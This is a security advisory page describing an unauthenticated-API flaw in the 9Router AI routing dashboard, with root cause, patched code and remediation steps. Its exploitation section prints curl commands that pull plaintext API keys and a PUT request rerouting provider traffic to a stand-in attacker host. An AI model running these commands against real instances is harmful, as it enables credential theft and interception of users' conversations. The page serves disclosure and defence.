CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



GHSA-VJC7-JRH9-9J86

Unauthenticated CRUD and Sensitive Data Exposure in 9Router API Endpoints

Amit Schendel
Amit Schendel
Senior Security Researcher

Jul 7, 2026·5 min read·2 visits

Executive Summary (TL;DR)

Unauthenticated API endpoints in 9Router expose sensitive API keys, allow unauthorized configuration changes, and leak multi-turn conversation transcripts.

An access control deficiency in the 9Router dashboard allows unauthenticated remote attackers to perform full CRUD operations on integrated AI providers, extract plaintext API keys, and access complete system conversation histories.

Vulnerability Overview

9Router functions as an AI orchestration and routing middleware dashboard built on the Next.js framework. It acts as a central hub for forwarding user prompts to various large language model (LLM) providers like OpenAI, Anthropic, and GitHub Copilot based on availability, latency, or cost constraints.\n\nBecause 9Router is designed to manage high-value API credentials and record comprehensive chat history telemetry, securing its backend interface is critical. However, in versions prior to and including 0.4.41, multiple critical API routes exposed directly to the internet lacked any form of session validation or access control check.\n\nThis omission exposes the entire system state, allowing any remote client to interact with administrative APIs. This vulnerability is classified under CWE-306 (Missing Authentication for Critical Function), CWE-862 (Missing Authorization), and CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor).

Root Cause Analysis

The root cause of these access control failures lies in the design of the Next.js App Router handlers inside the 9Router dashboard codebase. In Next.js, API routes defined in files such as src/app/api/providers/route.ts are automatically compiled as publicly reachable endpoints unless developers explicitly implement intercepting logic.\n\nDuring development, no global authentication middleware was registered under middleware.ts to intercept requests targeting /api/providers or /api/usage. Consequently, these route files processed all incoming HTTP methods (GET, POST, PUT, DELETE) directly without querying session status or verifying bearer tokens.\n\nThe vulnerability in /api/usage/stats/route.ts originates from a secondary serialization failure. The query handler retrieves the raw records containing full third-party API key values to generate statistics. Instead of filtering the sensitive database outputs or masking credential fields before returning them to the caller, the route serializes the unmodified database objects directly into the JSON response structure.

Code Analysis

To illustrate the structural differences, consider the pattern of a vulnerable Next.js Route Handler versus a secured alternative.\n\ntypescript\n// Vulnerable: src/app/api/providers/route.ts\nimport { NextResponse } from 'next/server';\nimport { prisma } from '@/lib/db';\n\n// GET handler returns all active provider configurations without credentials verification\nexport async function GET() {\n const providers = await prisma.provider.findMany();\n return NextResponse.json(providers);\n}\n\n// POST handler accepts and executes database writes from any remote client\nexport async function POST(request: Request) {\n const body = await request.json();\n const newProvider = await prisma.provider.create({ data: body });\n return NextResponse.json(newProvider, { status: 201 });\n}\n\n\ntypescript\n// Patched: Implementation utilizing robust session verification\nimport { NextResponse } from 'next/server';\nimport { prisma } from '@/lib/db';\nimport { getServerSession } from 'next-auth';\nimport { authOptions } from '@/lib/auth-options';\n\nexport async function GET() {\n const session = await getServerSession(authOptions);\n if (!session) {\n return NextResponse.json({ error: 'Unauthorized' }, { status: 401 });\n }\n\n // Ensure keys are excluded from selection to prevent leaking credentials\n const providers = await prisma.provider.findMany({\n select: {\n id: true,\n name: true,\n baseUrl: true,\n // apiKey is explicitly omitted here\n }\n });\n return NextResponse.json(providers);\n}\n\n\nThis code comparison highlights that securing the application requires both verification of session context and careful data filtering to ensure secrets do not get serialized into public payloads.

Exploitation and Attack Path Analysis

Exploiting these unauthenticated endpoints is straightforward and requires only standard command-line tools. An attacker can construct a network flow model of the vulnerability as shown below:\n\nmermaid\ngraph LR\n Attacker["Unauthenticated Attacker"] -->|1. GET /api/usage/stats| VulnerableRoute["Next.js API Routes"]\n VulnerableRoute -->|2. Raw Query| Database["Database (Prisma)"]\n Database -->|3. Unmasked Credentials| VulnerableRoute\n VulnerableRoute -->|4. Cleartext API Keys| Attacker\n\n\nInitially, the attacker audits the host's /api/providers endpoint to enumerate configured AI integrations. This request yields a JSON document with active system parameters, including resource identifiers and the layout of the deployed AI infrastructure.\n\nbash\ncurl -s https://vulnerable-instance.local/api/providers\n\n\nTo extract active credentials, the attacker queries /api/usage/stats. Because the server does not filter the returned datasets, the payload includes unmasked authorization tokens for systems like OpenAI or Anthropic.\n\nbash\ncurl -s https://vulnerable-instance.local/api/usage/stats\n\n\nFinally, an attacker can hijack the prompt routing mechanism itself by sending a PUT or POST payload to change the target API endpoint URL. By pointing a provider's database record to a malicious server, the attacker intercepts all subsequent downstream chat requests containing proprietary data or system instructions.\n\nbash\ncurl -X PUT https://vulnerable-instance.local/api/providers/target-id \\\n -H "Content-Type: application/json" \\\n -d '{"name":"hijacked-connection","apiKey":"sk-attacker-key","baseUrl":"https://attacker-intercept.com/v1"}'\n

Impact Assessment

The architectural position of 9Router amplifies the consequences of this vulnerability. An attacker obtaining full CRUD operations over providers can manipulate where user queries are routed. This enables prompt interception, where proprietary algorithms, corporate source code, or internal business queries sent to the AI are logged by an attacker-controlled endpoint.\n\nFurthermore, the leakage of plaintext keys represents an immediate financial risk. Valid API keys for services like Anthropic Claude or OpenAI GPT-4 can be used to run automated scripts or host secondary applications at the victim's expense, incurring substantial billing charges.\n\nFinally, the exposure of /api/usage/request-logs and detailed trace endpoints exposes full multi-turn conversation payloads. This compromises user confidentiality on a systemic scale, revealing sensitive internal discussions, administrative inquiries, and telemetry details.

Remediation and Defenses

Mitigation requires immediate code updates and credential remediation. Administrators must upgrade 9Router installations to a patched version such as 0.4.45. This version implements authentication checks on critical administrative routes.\n\nBecause credentials were leaked in plaintext, all API keys registered in the dashboard before patching must be considered compromised. Operators must immediately rotate every OpenAI, Anthropic, and secondary service credential associated with the platform to terminate active unauthorized access sessions.\n\nTo secure self-deployed instances directly, configure a Next.js middleware.ts file to block requests lacking valid session tokens. This global handler should reject calls targeting administrative routes with an HTTP 401 response before database execution occurs.\n\ntypescript\n// Example middleware.ts entry point\nimport { NextResponse } from 'next/server';\nimport type { NextRequest } from 'next/server';\n\nexport function middleware(request: NextRequest) {\n const token = request.cookies.get('next-auth.session-token') || request.headers.get('Authorization');\n if (!token && (request.nextUrl.pathname.startsWith('/api/providers') || request.nextUrl.pathname.startsWith('/api/usage'))) {\n return NextResponse.json({ error: 'Authentication Required' }, { status: 401 });\n }\n return NextResponse.next();\n}\n

Technical Appendix

CVSS Score
10.0/ 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Affected Systems

9Router Dashboard Deployments

Affected Versions Detail

Product
Affected Versions
Fixed Version
9router
decolua
<= 0.4.410.4.45
AttributeDetail
CWE IDCWE-306, CWE-200, CWE-862
Attack VectorNetwork
CVSS Score10.0
ImpactTotal Access Control Bypass, Credential Harvest, Traffic Hijacking
Exploit StatusProof of Concept available

MITRE ATT&CK Mapping

T1190Exploit Public-Facing Application
Initial Access
T1552Unsecured Credentials
Credential Access
T1119Automated Collection
Collection
CWE-306
Missing Authentication for Critical Function

The application does not perform any authentication checks for critical functionality, allowing unauthorized access to restricted endpoints.

Vulnerability Timeline

Advisory published on GitHub Advisory Database
2026-07-06

References & Sources

  • [1]GHSA-VJC7-JRH9-9J86 on GitHub Advisory Database
  • [2]Vendor Security Advisory
  • [3]9Router GitHub Project Repository

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•about 2 hours ago•CVE-2026-55790
7.4

CVE-2026-55790: DOM-Based Cross-Site Scripting in Craft CMS Support Widget

A DOM-based cross-site scripting (XSS) vulnerability exists in Craft CMS versions 4.0.0-RC1 through 4.17.15 and 5.0.0-RC1 through 5.9.22. The flaw resides within the CraftSupport widget's feedback search component, which fails to neutralize GitHub issue titles before rendering them into the administrator's control panel. An unauthenticated attacker can exploit this vulnerability by submitting a crafted issue to the public Craft CMS repository on GitHub.

Alon Barad
Alon Barad
3 views•7 min read
•about 2 hours ago•CVE-2026-55793
5.9

CVE-2026-55793: Stored DOM-Based Cross-Site Scripting in Craft CMS ElementTableSorter

CVE-2026-55793 is a DOM-based Stored Cross-Site Scripting (XSS) vulnerability affecting Craft CMS versions 5.0.0-RC1 through 5.9.22. An authenticated user with minimum Author privileges can store a malicious payload in an entry's title. When an administrator or high-privileged user performs a drag-and-drop operation under the modified entry in the structure table view, the unescaped payload is retrieved and concatenated into raw HTML, resulting in arbitrary JavaScript execution within the context of the administrative session.

Alon Barad
Alon Barad
4 views•8 min read
•about 3 hours ago•CVE-2026-55794
8.7

CVE-2026-55794: Authenticated Remote Code Execution via Template Injection in Craft CMS

Craft CMS versions 5.9.0 through 5.9.9 are vulnerable to authenticated Remote Code Execution (RCE). An attacker with control panel permissions to edit entries can inject malicious Twig templates into the client-side HTTP Referer header. During the post-save redirect sequence, the server evaluates this user-controlled header using an unsandboxed Twig rendering function, leading to arbitrary system command execution.

Amit Schendel
Amit Schendel
5 views•6 min read
•about 3 hours ago•GHSA-CGFV-JRFP-2R7V
8.5

GHSA-cgfv-jrfp-2r7v: Authenticated SQL Injection in OpenRemote Datapoint Crosstab Export

An authenticated SQL injection vulnerability exists in the datapoint crosstab export functionality of OpenRemote. The vulnerability is caused by insecure manual SQL string construction that concatenates user-controlled display data, specifically asset display names and attribute names, directly into raw SQL statements. These statements are processed by the PostgreSQL database engine using the crosstab function to structure dynamic CSV outputs.

Amit Schendel
Amit Schendel
4 views•5 min read
•about 4 hours ago•GHSA-QRWJ-VH9X-GW5V
8.0

GHSA-QRWJ-VH9X-GW5V: Cross-Agent Server-Side Request Forgery and Remote Code Execution in Coder Workspace Agent

An insecure redirect vulnerability in Coder allows an authenticated attacker who controls a workspace agent to perform unauthorized cross-agent file operations and achieve remote code execution in other workspaces. By exploiting default redirect-following behavior in the control-plane's HTTP client, a malicious agent can redirect legitimate requests to a victim's deterministic tailnet IP address.

Amit Schendel
Amit Schendel
5 views•5 min read
•about 4 hours ago•CVE-2026-35341
7.1

CVE-2026-35341: Local Privilege Escalation and Permission Degradation in uutils coreutils mkfifo

CVE-2026-35341 is a high-severity vulnerability in the mkfifo utility of uutils coreutils, involving a logic-flow bypass and a TOCTOU race condition that permits unauthorized file permission degradation and privilege escalation.

Alon Barad
Alon Barad
4 views•7 min read